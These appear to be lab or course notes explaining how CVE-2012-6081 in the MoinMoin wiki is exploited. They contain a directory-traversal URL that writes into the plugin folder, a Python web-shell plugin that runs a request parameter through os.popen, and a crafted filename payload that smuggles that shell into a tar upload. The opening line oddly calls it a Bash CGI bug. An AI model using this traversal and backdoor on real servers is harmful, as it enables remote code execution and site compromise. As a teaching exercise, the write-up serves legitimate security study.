This exercise covers the exploitation of a Bash vulnerability through a CGI.

This exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian's wiki and Python documentation website

• Vulnerabilities: directory traversal and unrestricted file upload

• Directory traversal bug:

http://172.16.230.168/moin/secretuser?action=twikidraw&do=modify&target=../../../../../../../../../data/plugin/action/moinexec.py open drawing app then save we can see the target file is moinexec.py, meaning we can save to moinexec.py file on the server. This would be our backdoor for code execution.

• code execution: Moinmoin support code execution. If we create a file in /var/lib/moin/mywiki/data/plugin/action/ and name it as test.py we can call it by go to http://vulnerable/moin/WikiSandBox?action=test&cmd=uname%20-a

import os
def execute(pagename, request):
  stream = os.popen(request.values['cmd'])
  request.write(stream.read())

• Unrestricted file upload basically the drawings are saved as a tar file on the specified location. In order to get code execution we need the file to have valid python code. We are limited to use just the filename as where we can put the payload. Tar specification says the filenames are limited to 100 characters only

• create a plugin we need to craft the code to look like a filename extension ex: drawing[.payload] attacker uses ternary if else with condition always evaluates to false to skip drawing.z string:

drawing.z if()else()
import os
def execute(pagename, request):
  stream = os.popen(request.values['cmd'])
  request.write(stream.read())

but payload can't contain more "." since otherwise only code after the last "." will be evaluated we also need to limit the number of charactors to 100 payload="drawing.z if()else()\nimport os\ndef execute(p,r):exec"print>>r,os\56popen(r\56values['c'])\56read()""

after compression of the payload we have: It's valid python code. It starts with drawing.. It contains def execute(p,r):. It does not contain any dot (.) It is less than 100 characters (due to the tar format).

need to be logged in to upload the plugin file.

Due to security reason, java applet cannot be ran in chrome or firefox. Only safari worked for me after I whitelist the server in java control panel. Only need this for the demo.

http://www.thefengs.com/wuchang/courses/cs410/FinalProject.txt